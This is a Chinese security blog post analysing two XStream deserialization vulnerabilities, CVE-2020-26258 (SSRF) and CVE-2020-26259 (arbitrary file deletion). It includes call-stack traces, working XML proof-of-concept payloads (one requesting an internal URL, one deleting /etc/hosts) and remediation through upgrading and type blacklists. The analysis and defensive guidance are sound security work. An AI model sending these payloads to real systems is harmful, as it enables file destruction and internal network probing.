[CVE-2020-26258/26259]Xstream任意文件删除/SSRF漏洞

最新推荐文章于 2024-08-07 11:50:10 发布
最新推荐文章于 2024-08-07 11:50:10 发布
阅读量3.3k 收藏 4
点赞数 4
分类专栏: java Web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/111194893
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

漏洞详情

CVE-2020-26259:
任意文件删除。
在这里插入图片描述

细节

Xstream转换Map的时候会拿到
会计算Map的Key的hash值:
在这里插入图片描述
这里的key是jdk.nashorn.internal.objects.NativeString类型,
继续调用hashCode方法
在这里插入图片描述
在C:\Program Files\Java\jdk1.8.0_172\jre\lib\ext\nashorn.jar!\jdk\nashorn\internal\objects\NativeString的hashCode方法中
在这里插入图片描述
在这里插入图片描述
调用这里:

<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>

指定class的toString方法,
在这里插入图片描述
这里的InputStream是

<is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>

指定的class类型。
在这里插入图片描述
在其close方法中触发了文件删除操作:
在这里插入图片描述
部分调用栈:

close:145, ReadAllStream$FileStream (com.sun.xml.internal.ws.util)
get:183, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)

com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data的get方法中,调用了InpuStream(这里是指定的com.sun.xml.internal.ws.util.ReadAllStream$FileStream)的close方法,而在这个特殊的InputStream里进行了删除临时文件操作,实现了任意文件删除。
在这里插入图片描述

CVE-2020-26258:
SSRF

在这里插入图片描述

细节

在这里插入图片描述

调用栈:

getInputStream:107, URLDataSource (javax.activation)
get:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)

在这里插入图片描述

poc

[CVE-2020-26258] SSRF

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='javax.activation.URLDataSource'>
            <url>http://localhost:8080/internal/:</url>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

[CVE-2020-26259]任意文件删除

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
              <tempFile>/etc/hosts</tempFile>
            </is>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

修复建议

升级至 1.4.15 版本,下载链接为:

https://x-stream.github.io/changes.html#1.4.15

临时修补建议
低于 1.4.15 的不同版本用户可以按照以下代码设置黑名单:

  • 使用 XStream 1.4.14 的用户,只需在 XStream 的设置代码中添加两行即可:
xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
  • 使用 XStream 1.4.13 的用户,只需在XStream的设置代码中添加三行代码即可:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
  • 使用 XStream 1.4.7 到 1.4.12 的用户,需要设置多个黑名单:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
  • 使用 XStream 1.4.6 或更低版本的用户可以注册自己的 Converter ,以防止反序列化当前已知的有危害的 Java 类型。
xstream.registerConverter(new Converter() {
  public boolean canConvert(Class type) {
|type.getName().equals("javax.imageio.ImageIO$ContainsFilter")|type.getName().equals("jdk.nashorn.internal.objects.NativeString")| |
|type == java.lang.Void.class|void.class|Proxy.isProxy(type)|
|type.getName().startsWith("javax.crypto.")|type.getName().endsWith("$LazyIterator")|type.getName().endsWith(".ReadAllStream$FileStream"));|
  }


  public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
    throw new ConversionException("Unsupported type due to security reasons.");
  }


  public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
    throw new ConversionException("Unsupported type due to security reasons.");
  }
}, XStream.PRIORITY_LOW);

参考

这个组件对漏洞的修复方式也是黑名单的,会不会也出现像fastjson一样的情况。

caiqiiqi
关注
专栏目录
java class 文件internal error_【漏洞通告】XStream 任意文件删除漏洞CVE202026258CVE202026259)...
weixin_29360387的博客
12-24 588
漏洞名称 :XStream 反序列化漏洞CVE-2020-26258CVE-2020-26259威胁等级 : 高危影响范围:XStream <= 1.4.14漏洞类型 :反序列化利用难度 : 简单 漏洞分析 1XStream组件介绍XStream是Java类库,用来将对象序列化成XML(JSON)或反序列化为对象。XStream在运行时使用Java反射机...
xstream 版本_XStream任意文件删除/服务端请求伪造漏洞预警通报(CVE202026259/CVE202026258)...
weixin_28862113的博客
01-21 1113
大网安协【2020-77】近日,大连网络安全信息通报机制合作单位新华三集团提醒,新华三攻防实验室监测到XStream官方更新了两则漏洞风险通告(CVE-2020-26258CVE-2020-26259),并进行了复现和分析。1. 漏洞综述1.1 漏洞背景XStream是一个简单、易用的Java类库,主要用于在Java对象和XML之间进行序列化和反序列化,支持所有的基础类型、数组及集合...
xstream xml转对象_【漏洞通告】XStream < 1.4.14 远程代码执行高危漏洞CVE202026217)...
weixin_39764379的博客
12-12 631
文章转载自阿里云先知 概述2020年11月16日,国内有关安全团队监测到XStream官方发布安全更新,修复了 CVE-2020-26217 XStream远程代码执行漏洞漏洞描述XStream是一个常用的Java对象和XML相互转换的工具。近日XStream官方发布安全更新,修复了 CVE-2020-26217 XStream远程代码执行漏洞。攻击者通过构造恶意的XML文...
xstream最新版本_【漏洞预警】XStream小于1.4.14远程代码执行漏洞CVE202026217)
weixin_39819576的博客
11-28 1776
01漏洞概述近日,XSteam官方发布版本更新,修复了一个安全漏洞。该漏洞编号为CVE-2020-26217,其最初报告为CVE-2017-9805,即未初始化安全框架的XStream实例取消任务时,存在任意命令执行漏洞。02影响范围XStream < 1.4.1403安全版本XStream 1.4.1404修复建议官方已在最新版本中修复了该漏洞,请受影响的用户尽快通过下方链接升级...
XStream 代码问题漏洞CVE-2021-21345)
最新发布
FCH的博客
08-07 271
目前厂商已发布升级补丁以修复漏洞,建议受影响的用户,及时升级至1.4.16及以上版本。补丁获取链接:https://x-stream.github.io/download.html。这里我们在这边利用 exclusion 排除weixin-java-mp的子依赖,然后再单独引入指定版本的xstream。1,在idea中全文件搜索xstream中没有搜索到,可以在 idea tearminal 中执行命令,查找对应的依赖。xstream:jar:1.4.20 >= 官方建议升级版本1.4.16。
xstream 去掉class
xixingzhe2的博客
09-19 835
开发十年,就只剩下这套Java开发体系了 &gt;&gt;&gt;    ...
CVE-2020-26217: XStream 远程代码执行漏洞通告
爱国小白帽
11-16 5977
原创360CERT[三六零CERT](javascript:void(0)???? 2020-11-16 12:09:18 报告编号:B6-2020-111601 报告来源:360CERT 报告作者:360CERT 更新日期:2020-11-16 0x01 漏洞简述 2020年11月16日,360CERT监测发现 XStream 发布了 XStream 安全更新 的风险通告,该漏洞编号为 CVE-2020-26217 ,漏洞等级:严重 ,漏洞评分:9.8 。 XStream 发布安全更新修复了一处反
服务器漏洞文件删除漏洞,漏洞资源|XStream随意文件删除/服务器端请求仿冒漏洞风险性通知(CVE-2021-26259,CVE-2021-26258)...
weixin_35182625的博客
08-03 496
近日,腾讯云服务安全运营管理中心检测到,XStream官方发布有关XStream反序列化漏洞的风险性通知(漏洞序号:CVE-2020-26259,CVE-2020-26258),假如编码中应用了XStream,未受权的远程控制攻击者,可结构特殊的实例化数据信息导致随意文件删除或服务器端请求仿冒。为防止您的业务流程受影响,腾讯云服务安全性建议立即进行安全性自纠自查,如在受影响范畴,请您立即开展升级修...
XStream 组件漏洞修复
悟●禅●酒的专栏
04-06 2320
风险描述 XStream 是Java 类库中的常用组件,可将Java 对象序列化为XML,反之可将Java 对象和XML 文档相互转换。 XStream 官方发布安全公告,披露多个反序列化漏洞,包括: 1、拒绝服务漏洞CVE-2021-21341/21348)攻击者可利用该漏洞操纵已处理的输入流并替换或注入对象,执行恶意正则表达式的计算,从而造成拒绝服务攻击。 2、服务端请求伪造漏洞CVE-2021-21342/21349)攻击者可利用该漏洞操纵已处理的输入流并替换或注入对象,从而伪造服务端请求。
XStream 高危漏洞合集,XStream 组件反序列化漏洞
weixin_45314962的博客
11-27 2352
CVE-2021-29505反序列化代码执行漏洞
XStream1.4.16反序列化漏洞CVE-2020-26258CVE-2020-26259
05-08
XStream是一个常用的Java对象和XML相互转换的工具。...攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析
smellycat000的专栏
12-16 3710
聚焦源代码安全,网罗国内外最新资讯!Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可...
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505)
Tencent_SRC的博客
05-17 5721
前言上周五XStream官方发布安全更新,由于官方把需要公告的CVE-2021-29505(任意代码执行漏洞)链接贴错成了CVE-2020-26258SSRF漏洞)链接,导致很多人没有重...
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1840
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 996
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
java字符串大小写转换
yuekangwei的博客
08-23 961
import static jdk.nashorn.internal.objects.NativeString.toLowerCase; import static jdk.nashorn.internal.objects.NativeString.toUpperCase; /** * 该代码展示字符串大小写 */ public class test { public static void main(String[] args) { //方法一: System.o
XStream反序列化漏洞(cve-2020-26258/cve-2020-26259)
chaojixiaojingang
12-17 3699
1.漏洞描述 XStream是一个常用的Java对象和XML相互转换的工具。在运行XSteam的服务上,未授权的远程攻击者通过构造特定的序列化数据 ,可造成任意文件删除/服务端请求伪造(SSRF) 。 2.影响版本 XStream <= 1.4.14 3.漏洞POC 1)cve-2020-26259任意文件删除 import com.thoughtworks.xstream.XStream; /* CVE-2020-26259: XStream is vulnerab...
jdk.nashorn.internal.runtime 不存在
Rebecca07的博客
11-15 5617
jdk.nashorn.internal.runtime 不存在
使用java方式配置spring
qq_45745319的博客
03-16 191
1.创建实体类:User package com.huahua.pojo; import jdk.nashorn.internal.objects.annotations.Constructor; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Value; import org.springframework.conte
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值